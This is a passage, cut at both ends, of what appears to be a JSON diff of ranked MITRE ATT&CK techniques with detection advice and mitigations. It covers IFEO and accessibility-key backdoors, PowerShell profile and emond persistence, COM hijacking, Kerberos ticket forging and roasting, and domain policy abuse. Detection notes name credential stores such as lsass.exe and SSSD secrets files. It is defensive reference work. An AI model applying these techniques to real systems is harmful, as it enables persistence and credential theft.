  • Shim-Detector-Lite - detects installation of custom shim databases
    • \n
  • Shim-Guard - monitors registry for any shim installations
    • \n
  • ShimScanner - forensic tool to find active shims in memory
    • \n
  • ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
    • \n
\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.", + "mitigations": [ + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1052", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ] + }, + { + "tid": "T1546.012", + "name": "Event Triggered Execution: Image File Execution Options Injection", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\nSimilar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\nSimilar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\nMalware may also use IFEO to Impair Defenses by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)", + "url": "https://attack.mitre.org/techniques/T1546/012", + "detection": "Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)", + "mitigations": [] + }, + { + "tid": "T1546.013", + "name": "Event Triggered Execution: PowerShell Profile", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.\nPowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) \nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) \nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)", + "url": "https://attack.mitre.org/techniques/T1546/013", + "detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n
    \n
  • $PsHome\\Profile.ps1
    • \n
  • $PsHome\\Microsoft.{HostProgram}_profile.ps1
    • \n
  • $Home\\My Documents\\PowerShell\\Profile.ps1
    • \n
  • $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1
    • \n
\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1546.014", + "name": "Event Triggered Execution: Emond", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a Launch Daemon that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the Launch Daemon configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the Launch Daemon service.", + "url": "https://attack.mitre.org/techniques/T1546/014", + "detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1546.015", + "name": "Event Triggered Execution: Component Object Model Hijacking", + "description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model) References to various COM objects are stored in the Registry. \nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. ", + "url": "https://attack.mitre.org/techniques/T1546/015", + "detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: Reg) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. \nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ", + "mitigations": [] + } + ] + }, + { + "rank": 49, + "tid": "T1046", + "name": "Network Service Scanning", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.", + "url": "https://attack.mitre.org/techniques/T1046", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nNormal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.", + "score": 1.0751992322209523, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ], + "subtechniques": [] + }, + { + "rank": 50, + "tid": "T1012", + "name": "Query Registry", + "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the Reg utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from Query Registry during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "url": "https://attack.mitre.org/techniques/T1012", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nInteraction with the Windows Registry may come from the command line using utilities such as Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 1.0652116823961904, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 51, + "tid": "T1040", + "name": "Network Sniffing", + "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning and SMB Relay, can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.", + "url": "https://attack.mitre.org/techniques/T1040", + "detection": "Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a Adversary-in-the-Middle attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.", + "score": 1.039830575535238, + "network_score": 0.2, + "process_score": 0.2, + "cloud_score": 0.2, + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ], + "subtechniques": [] + }, + { + "rank": 52, + "tid": "T1133", + "name": "External Remote Services", + "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\nAccess to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\nAccess may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)", + "url": "https://attack.mitre.org/techniques/T1133", + "detection": "Follow best practices for detecting adversary use of Valid Accounts for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.\nWhen authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.", + "score": 0.9989999999999999, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ], + "subtechniques": [] + }, + { + "rank": 53, + "tid": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable Pass the Ticket. Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\nOn Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for Pass the Ticket. The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)", + "url": "https://attack.mitre.org/techniques/T1558", + "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\nMonitor for indications of Pass the Ticket being used to move laterally. \nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\nMonitor for unusual processes accessing secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.", + "score": 0.9882515733333332, + "process_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ], + "subtechniques": [ + { + "tid": "T1558.001", + "name": "Steal or Forge Kerberos Tickets: Golden Ticket", + "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using OS Credential Dumping and privileged access to a domain controller.", + "url": "https://attack.mitre.org/techniques/T1558/001", + "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\nMonitor for indications of Pass the Ticket being used to move laterally. ", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1558.002", + "name": "Steal or Forge Kerberos Tickets: Silver Ticket", + "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\nPassword hashes for target services may be obtained using OS Credential Dumping or Kerberoasting.", + "url": "https://attack.mitre.org/techniques/T1558/002", + "detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1558.003", + "name": "Steal or Forge Kerberos Tickets: Kerberoasting", + "description": "Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force.(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) \nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\nThis same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)\nCracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.(Citation: SANS Attacking Kerberos Nov 2014)", + "url": "https://attack.mitre.org/techniques/T1558/003", + "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1558.004", + "name": "Steal or Forge Kerberos Tickets: AS-REP Roasting", + "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by Password Cracking Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \nPreauthentication offers protection against offline Password Cracking. When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline Password Cracking attacks similarly to Kerberoasting and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like PowerShell with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\nCracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.(Citation: SANS Attacking Kerberos Nov 2014)", + "url": "https://attack.mitre.org/techniques/T1558/004", + "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 54, + "tid": "T1484", + "name": "Domain Policy Modification", + "description": "Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.\nWith sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious Scheduled Task to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a Rogue Domain Controller.\nAdversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.", + "url": "https://attack.mitre.org/techniques/T1484", + "detection": "It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\nConsider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)", + "score": 0.9880952380952381, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to 